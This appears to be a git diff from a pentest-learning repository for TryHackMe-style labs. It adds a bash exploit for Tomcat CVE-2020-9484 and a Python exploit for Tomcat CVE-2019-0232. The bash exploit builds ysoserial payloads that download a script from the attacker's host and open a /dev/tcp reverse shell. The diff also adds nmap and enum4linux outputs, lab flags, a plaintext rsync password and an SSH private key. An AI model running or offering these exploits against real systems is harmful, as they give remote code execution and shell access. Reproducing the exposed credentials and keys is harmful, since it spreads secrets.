||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Executable
+93
@@ -0,0 +1,93 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ $# -ne 4 ]; then
|
||||||
|
echo " "
|
||||||
|
echo " CVE-2020-9484 Exploit"
|
||||||
|
echo " Apache Tomcat Deserialization"
|
||||||
|
echo " "
|
||||||
|
echo " Usage:"
|
||||||
|
echo " $0 [your IP] [your port] [target IP] [target port]"
|
||||||
|
echo " Example:"
|
||||||
|
echo " $0 192.168.100.4 1337 192.168.10.119 8080"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Gera payload 1 (comando que irá baixar o payload no server)
|
||||||
|
echo " [*] Gerando payload 1..."
|
||||||
|
java -jar ysoserial-all.jar CommonsCollections2 'curl http://'$1'/payload.sh > /tmp/payload.sh' > downloadPayload.session
|
||||||
|
|
||||||
|
# Gera payload 2 (payload que fará a conexão reversa)
|
||||||
|
echo " [*] Gerando payload 2..."
|
||||||
|
echo "#\!/bin/bash" > payload.sh;echo 'bash -c "bash -I >& /dev/tcp/'$1'/'$2' 0>&1"' >> payload.sh
|
||||||
|
|
||||||
|
# Gera payload 3 (dá permissões ao payload)
|
||||||
|
echo " [*] Gerando payload 3..."
|
||||||
|
java -jar ysoserial-all.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
|
||||||
|
|
||||||
|
# Gera payload 4 (executa o payload)
|
||||||
|
echo " [*] Gerando payload 4..."
|
||||||
|
java -jar ysoserial-all.jar CommonsCollections2 "bash /tmp/payload.sh" > executePayload.session
|
||||||
|
|
||||||
|
# Gera wordlist
|
||||||
|
echo " [*] Gerando wordlist..."
|
||||||
|
echo "../../../../../../tmp/" > wl.txt
|
||||||
|
echo "../../../../../tmp/" >> wl.txt
|
||||||
|
echo "../../../../tmp/" >> wl.txt
|
||||||
|
echo "../../../tmp/" >> wl.txt
|
||||||
|
echo "../../tmp/" >> wl.txt
|
||||||
|
echo "../../../../../../home/" >> wl.txt
|
||||||
|
echo "../../../../../home/" >> wl.txt
|
||||||
|
echo "../../../../home/" >> wl.txt
|
||||||
|
echo "../../../home/" >> wl.txt
|
||||||
|
echo "../../home/" >> wl.txt
|
||||||
|
echo "../../../../../../opt/" >> wl.txt
|
||||||
|
echo "../../../../../opt/" >> wl.txt
|
||||||
|
echo "../../../../opt/" >> wl.txt
|
||||||
|
echo "../../../opt/" >> wl.txt
|
||||||
|
echo "../../opt/" >> wl.txt
|
||||||
|
echo "../../../../../../opt/samples/" >> wl.txt
|
||||||
|
echo "../../../../../opt/samples/" >> wl.txt
|
||||||
|
echo "../../../../opt/samples/" >> wl.txt
|
||||||
|
echo "../../../opt/samples/" >> wl.txt
|
||||||
|
echo "../../opt/samples/" >> wl.txt
|
||||||
|
echo "../../../../../../opt/samples/uploads/" >> wl.txt
|
||||||
|
echo "../../../../../opt/samples/uploads/" >> wl.txt
|
||||||
|
echo "../../../../opt/samples/uploads/" >> wl.txt
|
||||||
|
echo "../../../opt/samples/uploads/" >> wl.txt
|
||||||
|
echo "../../opt/samples/uploads/" >> wl.txt
|
||||||
|
echo "../../../../../../usr/local/" >> wl.txt
|
||||||
|
echo "../../../../../usr/local/" >> wl.txt
|
||||||
|
echo "../../../../usr/local/" >> wl.txt
|
||||||
|
echo "../../../usr/local/" >> wl.txt
|
||||||
|
echo "../../usr/local/" >> wl.txt
|
||||||
|
echo "../../../../../../usr/local/tomcat/" >> wl.txt
|
||||||
|
echo "../../../../../usr/local/tomcat/" >> wl.txt
|
||||||
|
echo "../../../../usr/local/tomcat/" >> wl.txt
|
||||||
|
echo "../../../usr/local/tomcat/" >> wl.txt
|
||||||
|
echo "../../usr/local/tomcat/" >> wl.txt
|
||||||
|
|
||||||
|
echo " [!] Lembre-se de iniciar o web server neste diretório"
|
||||||
|
echo " [!] Lembre-se de abrir a porta "$2"/TCP"
|
||||||
|
|
||||||
|
# Explora
|
||||||
|
echo " [*] Explorando..."
|
||||||
|
for i in $(cat wl.txt);do
|
||||||
|
echo ' [+] Cookie:JSESSIONID='$i'downloadPayload'
|
||||||
|
curl -s 'http://'$3:$4'/index.jsp' -H 'Cookie:JSESSIONID='$i'downloadPayload' -F 'image=@downloadPayload.session' -a "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
curl -s 'http://'$3:$4'/index.jsp' -H 'Cookie:JSESSIONID='$i'downloadPayload' -A "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
echo ' [+] Cookie:JSESSIONID='$i'chmodPayload'
|
||||||
|
curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'chmodPayload' -F 'image=@chmodPayload.session' -a "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'chmodPayload' -A "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
echo ' [+] Cookie:JSESSIONID='$i'executePayload'
|
||||||
|
curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'executePayload' -F 'image=@executePayload.session' -a "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
curl -s http://$3:$4/index.jsp -H 'Cookie:JSESSIONID='$i'executePayload' -A "Chrome" &>/dev/null;
|
||||||
|
sleep 1;
|
||||||
|
done
|
||||||
|
|
||||||
|
# Remove arquivos gerados anteriormente
|
||||||
|
rm wl.txt payload.sh downloadPayload.session chmodPayload.session executePayload.session &>/dev/null
|
||||||
@@ -0,0 +1,36 @@
|
|||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
|
||||||
|
|
||||||
|
url = sys.argv[1]
|
||||||
|
|
||||||
|
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
|
||||||
|
|
||||||
|
cmd = sys.argv[2]
|
||||||
|
|
||||||
|
vuln_url = url + url_dir +cmd
|
||||||
|
|
||||||
|
|
||||||
|
print '''
|
||||||
|
_______ ________ ___ ___ __ ___ ___ ___ ____ ___
|
||||||
|
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \
|
||||||
|
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) |
|
||||||
|
| | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / /
|
||||||
|
| |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_
|
||||||
|
\_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____|
|
||||||
|
|
||||||
|
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
|
||||||
|
By Jas502n
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
|
||||||
|
print "Usage: python CVE-2019-0232.py url cmd"
|
||||||
|
|
||||||
|
print "The Vuln url:\n\n" ,vuln_url
|
||||||
|
|
||||||
|
r = requests.get(vuln_url)
|
||||||
|
|
||||||
|
|
||||||
|
print "\nThe Vuln Response Content: \n\n" , r.content
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
10.82.164.61
|
||||||
@@ -0,0 +1,41 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 10:54:29 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.164.61
|
||||||
|
Nmap scan report for 10.82.164.61
|
||||||
|
Host is up (0.059s latency).
|
||||||
|
Not shown: 65532 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|
||||||
|
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|
||||||
|
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
|
||||||
|
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|
||||||
|
|_ajp-methods: Failed to get a valid response for the OPTION request
|
||||||
|
8080/tcp open http Apache Tomcat 8.5.5
|
||||||
|
|_http-favicon: Apache Tomcat
|
||||||
|
|_http-title: Apache Tomcat/8.5.5
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=5/8%OT=22%CT=1%CU=35970%PV=Y%DS=3%DC=T%G=Y%TM=69FDA552
|
||||||
|
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=
|
||||||
|
OS:8)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=104%GCD=1%ISR=10D%
|
||||||
|
OS:TI=Z%CI=I%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)SEQ(SP=
|
||||||
|
OS:FE%GCD=1%ISR=FF%TI=Z%CI=I%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8
|
||||||
|
OS:NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W
|
||||||
|
OS:3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=
|
||||||
|
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
|
||||||
|
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
|
||||||
|
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z
|
||||||
|
OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
|
||||||
|
OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 3306/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 61.33 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 61.36 ms 10.82.164.61
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 10:56:50 2026 -- 1 IP address (1 host up) scanned in 141.50 seconds
|
||||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
|
|||||||
|
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
|
||||||
|
If you have any questions, please text or phone us.
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
Purge regularly data that is not needed anymore
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
10.81.148.220
|
||||||
@@ -0,0 +1,108 @@
|
|||||||
|
# Nmap 7.99 scan initiated Fri May 8 14:45:27 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt -vv 10.81.148.220
|
||||||
|
Increasing send delay for 10.81.148.220 from 0 to 5 due to 4072 out of 10179 dropped probes since last increase.
|
||||||
|
Increasing send delay for 10.81.148.220 from 5 to 10 due to 11 out of 15 dropped probes since last increase.
|
||||||
|
Nmap scan report for 10.81.148.220
|
||||||
|
Host is up, received echo-reply ttl 62 (0.14s latency).
|
||||||
|
Scanned at 2026-05-08 14:45:28 CEST for 809s
|
||||||
|
Not shown: 65523 closed tcp ports (reset)
|
||||||
|
PORT STATE SERVICE REASON VERSION
|
||||||
|
22/tcp open ssh syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 3072 98:e3:07:4c:6b:a4:76:d3:79:3b:a9:d1:99:b0:46:eb (RSA)
|
||||||
|
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqmyZu4KaquMZ07hdtn2wyFLtqufrbvj6tu4yxV+V1lCBPLusk08xoEB/ZApuqEvXFiQM8jSDz8jVyZh+b2TE+AWCllzQ4tZnlcy0GuSvnrjZGJrSMESwuAlMTQuLXhoPeRnDHgPI6JWnRR6J0Gn6iHv3i1t5tEWploahO5YK5GBXBQHwljMNIaE0Mlopu3vfj6Y3S3BK/cvHyGYbhtSzQdFLYp+z/MkqPjqlQ45yEiLTk2U6IT42YrbJddT/wcnjnColbt0dD8UvcjEdeCg9SIZW9aZpmTns6jztPiQRGZonRckcRNvCko5vDJSXzBELoy6PQeDiZXYfCw3KlQDilmzXlcSvW4MhZ84tznqdzyGLHniLmm/DsXv+g91/gGNYh8PPqACtHXwTGz5Gm0CKI4F+z16x9tgGgvLw//QkAChlK3fmUWoyThL6ZW2X+MKKYpw2ymBHRdO7zGqAASSV4gml63NNt0jXWBjpd/w/77AJgJn0QpkBZ0Vb8Yyc5rdM=
|
||||||
|
| 256 31:34:e6:37:c2:d5:09:63:3d:0a:1c:73:f9:1b:8d:49 (ECDSA)
|
||||||
|
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPa5KoSCT2U8tKjs86x8w4VME70mSnSK7ZhfaXE5mo4y8+ERNlcMAJG0nSlvwOYDWbII3sA76PsnUReCuyDj6Ho=
|
||||||
|
| 256 ce:eb:45:8f:c8:cb:b8:c6:33:cf:8c:40:97:38:4d:6b (ED25519)
|
||||||
|
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAlHg69fqfg/GBqzjBKrRDT3PXbto4Qhvx7/PfsiflSB
|
||||||
|
111/tcp open rpcbind syn-ack ttl 62 2-4 (RPC #100000)
|
||||||
|
| rpcinfo:
|
||||||
|
| program version port/proto service
|
||||||
|
| 100000 2,3,4 111/tcp rpcbind
|
||||||
|
| 100000 2,3,4 111/udp rpcbind
|
||||||
|
| 100000 3,4 111/tcp6 rpcbind
|
||||||
|
| 100000 3,4 111/udp6 rpcbind
|
||||||
|
| 100003 3 2049/udp nfs
|
||||||
|
| 100003 3 2049/udp6 nfs
|
||||||
|
| 100003 3,4 2049/tcp nfs
|
||||||
|
| 100003 3,4 2049/tcp6 nfs
|
||||||
|
| 100005 1,2,3 42205/udp mountd
|
||||||
|
| 100005 1,2,3 51151/tcp mountd
|
||||||
|
| 100005 1,2,3 59595/udp6 mountd
|
||||||
|
| 100005 1,2,3 60983/tcp6 mountd
|
||||||
|
| 100021 1,3,4 38519/tcp nlockmgr
|
||||||
|
| 100021 1,3,4 41999/tcp6 nlockmgr
|
||||||
|
| 100021 1,3,4 46131/udp6 nlockmgr
|
||||||
|
| 100021 1,3,4 46853/udp nlockmgr
|
||||||
|
| 100227 3 2049/tcp nfs_acl
|
||||||
|
| 100227 3 2049/tcp6 nfs_acl
|
||||||
|
| 100227 3 2049/udp nfs_acl
|
||||||
|
|_ 100227 3 2049/udp6 nfs_acl
|
||||||
|
139/tcp open netbios-ssn syn-ack ttl 62 Samba smbd 4
|
||||||
|
445/tcp open netbios-ssn syn-ack ttl 62 Samba smbd 4
|
||||||
|
873/tcp open rsync syn-ack ttl 62 (protocol version 31)
|
||||||
|
2049/tcp open nfs syn-ack ttl 62 3-4 (RPC #100003)
|
||||||
|
6379/tcp open redis syn-ack ttl 62 Redis key-value store
|
||||||
|
9090/tcp filtered zeus-admin no-response
|
||||||
|
37291/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005)
|
||||||
|
38519/tcp open nlockmgr syn-ack ttl 62 1-4 (RPC #100021)
|
||||||
|
40795/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005)
|
||||||
|
51151/tcp open mountd syn-ack ttl 62 1-3 (RPC #100005)
|
||||||
|
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||||
|
TCP/IP fingerprint:
|
||||||
|
OS:SCAN(V=7.99%E=4%D=5/8%OT=22%CT=1%CU=39961%PV=Y%DS=3%DC=T%G=Y%TM=69FDDE12
|
||||||
|
OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=
|
||||||
|
OS:A)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=10A%
|
||||||
|
OS:TI=Z%CI=Z%II=I%TS=A)SEQ(SP=FB%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F
|
||||||
|
OS:F%GCD=1%ISR=103%TI=Z%CI=Z%TS=A)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8
|
||||||
|
OS:NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3%W
|
||||||
|
OS:3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW7%CC=
|
||||||
|
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
|
||||||
|
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
|
||||||
|
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z
|
||||||
|
OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
|
||||||
|
OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
|
||||||
|
|
||||||
|
Uptime guess: 15.312 days (since Thu Apr 23 07:29:34 2026)
|
||||||
|
Network Distance: 3 hops
|
||||||
|
TCP Sequence Prediction: Difficulty=255 (Good luck!)
|
||||||
|
IP ID Sequence Generation: All zeros
|
||||||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
Host script results:
|
||||||
|
| smb2-time:
|
||||||
|
| date: 2026-05-08T12:58:55
|
||||||
|
|_ start_date: N/A
|
||||||
|
| nbstat: NetBIOS name: , NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|
||||||
|
| Names:
|
||||||
|
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|
||||||
|
| <00> Flags: <unique><active>
|
||||||
|
| <03> Flags: <unique><active>
|
||||||
|
| <20> Flags: <unique><active>
|
||||||
|
| WORKGROUP<00> Flags: <group><active>
|
||||||
|
| WORKGROUP<1d> Flags: <unique><active>
|
||||||
|
| WORKGROUP<1e> Flags: <group><active>
|
||||||
|
| Statistics:
|
||||||
|
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||||
|
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||||
|
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||||
|
|_clock-skew: -1s
|
||||||
|
| p2p-conficker:
|
||||||
|
| Checking for Conficker.C or higher...
|
||||||
|
| Check 1 (port 12380/tcp): CLEAN (Couldn't connect)
|
||||||
|
| Check 2 (port 35520/tcp): CLEAN (Couldn't connect)
|
||||||
|
| Check 3 (port 58973/udp): CLEAN (Failed to receive data)
|
||||||
|
| Check 4 (port 57845/udp): CLEAN (Failed to receive data)
|
||||||
|
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|
||||||
|
| smb2-security-mode:
|
||||||
|
| 3.1.1:
|
||||||
|
|_ Message signing enabled but not required
|
||||||
|
|
||||||
|
TRACEROUTE (using port 1025/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 218.41 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 218.76 ms 10.81.148.220
|
||||||
|
|
||||||
|
Read data files from: /usr/share/nmap
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Fri May 8 14:58:58 2026 -- 1 IP address (1 host up) scanned in 810.36 seconds
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
B65Hx562F@ggAZ@F
|
||||||
@@ -0,0 +1,7 @@
|
|||||||
|
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||||
|
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
|
||||||
|
QyNTUxOQAAACBh5zieFCGh1stlOmiafc07xEtedT3qin/0/DpWKNJBtAAAAJgf0D9MH9A/
|
||||||
|
TAAAAAtzc2gtZWQyNTUxOQAAACBh5zieFCGh1stlOmiafc07xEtedT3qin/0/DpWKNJBtA
|
||||||
|
AAAEAOW/3nmJPXdajcfFshsCDy55x6hiYV8XEijSAUTcPaTmHnOJ4UIaHWy2U6aJp9zTvE
|
||||||
|
S151PeqKf/T8OlYo0kG0AAAAEW5pa0BrYWxpLWxlYXJuaW5nAQIDBA==
|
||||||
|
-----END OPENSSH PRIVATE KEY-----
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGHnOJ4UIaHWy2U6aJp9zTvES151PeqKf/T8OlYo0kG0 nik@kali-learning
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
THM{da7c20696831f253e0afaca8b83c07ab}
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
THM{0a09d51e488f5fa105d8d866a497440a}
|
||||||
@@ -0,0 +1,193 @@
|
|||||||
|
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 8 16:33:16 2026
|
||||||
|
|
||||||
|
[34m =========================================( [0m[32mTarget Information[0m[34m )=========================================
|
||||||
|
|
||||||
|
[0mTarget ........... 10.81.148.220
|
||||||
|
RID Range ........ 500-550,1000-1050
|
||||||
|
Username ......... ''
|
||||||
|
Password ......... ''
|
||||||
|
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|
||||||
|
|
||||||
|
|
||||||
|
[34m ===========================( [0m[32mEnumerating Workgroup/Domain on 10.81.148.220[0m[34m )===========================
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32mGot domain/workgroup name: WORKGROUP
|
||||||
|
|
||||||
|
[0m
|
||||||
|
[34m ===============================( [0m[32mNbtstat Information for 10.81.148.220[0m[34m )===============================
|
||||||
|
|
||||||
|
[0mLooking up status of 10.81.148.220
|
||||||
|
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
|
||||||
|
<00> - B <ACTIVE>
|
||||||
|
<03> - B <ACTIVE>
|
||||||
|
<20> - B <ACTIVE>
|
||||||
|
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
|
||||||
|
WORKGROUP <1d> - B <ACTIVE> Master Browser
|
||||||
|
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
|
||||||
|
|
||||||
|
MAC Address = 00-00-00-00-00-00
|
||||||
|
|
||||||
|
[34m ===================================( [0m[32mSession Check on 10.81.148.220[0m[34m )===================================
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32mServer 10.81.148.220 allows sessions using username '', password ''
|
||||||
|
|
||||||
|
[0m
|
||||||
|
[34m ================================( [0m[32mGetting domain SID for 10.81.148.220[0m[34m )================================
|
||||||
|
|
||||||
|
[0mDomain Name: WORKGROUP
|
||||||
|
Domain Sid: (NULL SID)
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mCan't determine if host is part of domain or part of a workgroup
|
||||||
|
|
||||||
|
[0m
|
||||||
|
[34m ==================================( [0m[32mOS information on 10.81.148.220[0m[34m )==================================
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[E] [0m[31mCan't get OS info with smbclient
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32mGot OS info for 10.81.148.220 from srvinfo:
|
||||||
|
[0m IP-10-81-148-22Wk Sv PrQ Unx NT SNT ip-10-81-148-220 server (Samba, Ubuntu)
|
||||||
|
platform_id : 500
|
||||||
|
os version : 6.1
|
||||||
|
server type : 0x809a03
|
||||||
|
|
||||||
|
|
||||||
|
[34m =======================================( [0m[32mUsers on 10.81.148.220[0m[34m )=======================================
|
||||||
|
|
||||||
|
[0m
|
||||||
|
|
||||||
|
[34m =================================( [0m[32mShare Enumeration on 10.81.148.220[0m[34m )=================================
|
||||||
|
|
||||||
|
[0msmbXcli_negprot_smb1_done: No compatible protocol selected by server.
|
||||||
|
|
||||||
|
Sharename Type Comment
|
||||||
|
--------- ---- -------
|
||||||
|
print$ Disk Printer Drivers
|
||||||
|
shares Disk VulnNet Business Shares
|
||||||
|
IPC$ IPC IPC Service (ip-10-81-148-220 server (Samba, Ubuntu))
|
||||||
|
Reconnecting with SMB1 for workgroup listing.
|
||||||
|
Protocol negotiation to server 10.81.148.220 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
|
||||||
|
Unable to connect with SMB1 -- no workgroup available
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mAttempting to map shares on 10.81.148.220
|
||||||
|
|
||||||
|
[0m//10.81.148.220/print$ [35mMapping: [0mDENIED[35m Listing: [0mN/A[35m Writing: [0mN/A
|
||||||
|
//10.81.148.220/shares [35mMapping: [0mOK[35m Listing: [0mOK[35m Writing: [0mN/A
|
||||||
|
[33m
|
||||||
|
[E] [0m[31mCan't understand response:
|
||||||
|
|
||||||
|
[0mNT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
|
||||||
|
//10.81.148.220/IPC$ [35mMapping: [0mN/A[35m Listing: [0mN/A[35m Writing: [0mN/A
|
||||||
|
|
||||||
|
[34m ===========================( [0m[32mPassword Policy Information for 10.81.148.220[0m[34m )===========================
|
||||||
|
|
||||||
|
[0m
|
||||||
|
|
||||||
|
[+] Attaching to 10.81.148.220 using a NULL share
|
||||||
|
|
||||||
|
[+] Trying protocol 139/SMB...
|
||||||
|
|
||||||
|
[+] Found domain(s):
|
||||||
|
|
||||||
|
[+] IP-10-81-148-220
|
||||||
|
[+] Builtin
|
||||||
|
|
||||||
|
[+] Password Info for Domain: IP-10-81-148-220
|
||||||
|
|
||||||
|
[+] Minimum password length: 5
|
||||||
|
[+] Password history length: None
|
||||||
|
[+] Maximum password age: 136 years 37 days 6 hours 21 minutes
|
||||||
|
[+] Password Complexity Flags: 000000
|
||||||
|
|
||||||
|
[+] Domain Refuse Password Change: 0
|
||||||
|
[+] Domain Password Store Cleartext: 0
|
||||||
|
[+] Domain Password Lockout Admins: 0
|
||||||
|
[+] Domain Password No Clear Change: 0
|
||||||
|
[+] Domain Password No Anon Change: 0
|
||||||
|
[+] Domain Password Complex: 0
|
||||||
|
|
||||||
|
[+] Minimum password age: None
|
||||||
|
[+] Reset Account Lockout Counter: 30 minutes
|
||||||
|
[+] Locked Account Duration: 30 minutes
|
||||||
|
[+] Account Lockout Threshold: None
|
||||||
|
[+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes
|
||||||
|
|
||||||
|
|
||||||
|
[33m
|
||||||
|
[+] [0m[32mRetieved partial password policy with rpcclient:
|
||||||
|
|
||||||
|
|
||||||
|
[0mPassword Complexity: Disabled
|
||||||
|
Minimum Password Length: 5
|
||||||
|
|
||||||
|
|
||||||
|
[34m ======================================( [0m[32mGroups on 10.81.148.220[0m[34m )======================================
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32mGetting builtin groups:
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32m Getting builtin group memberships:
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32m Getting local groups:
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32m Getting local group memberships:
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32m Getting domain groups:
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[+] [0m[32m Getting domain group memberships:
|
||||||
|
|
||||||
|
[0m
|
||||||
|
[34m ==================( [0m[32mUsers on 10.81.148.220 via RID cycling (RIDS: 500-550,1000-1050)[0m[34m )==================
|
||||||
|
|
||||||
|
[0m[33m
|
||||||
|
[I] [0m[36mFound new SID:
|
||||||
|
[0mS-1-22-1
|
||||||
|
[33m
|
||||||
|
[I] [0m[36mFound new SID:
|
||||||
|
[0mS-1-5-32
|
||||||
|
[33m
|
||||||
|
[I] [0m[36mFound new SID:
|
||||||
|
[0mS-1-5-32
|
||||||
|
[33m
|
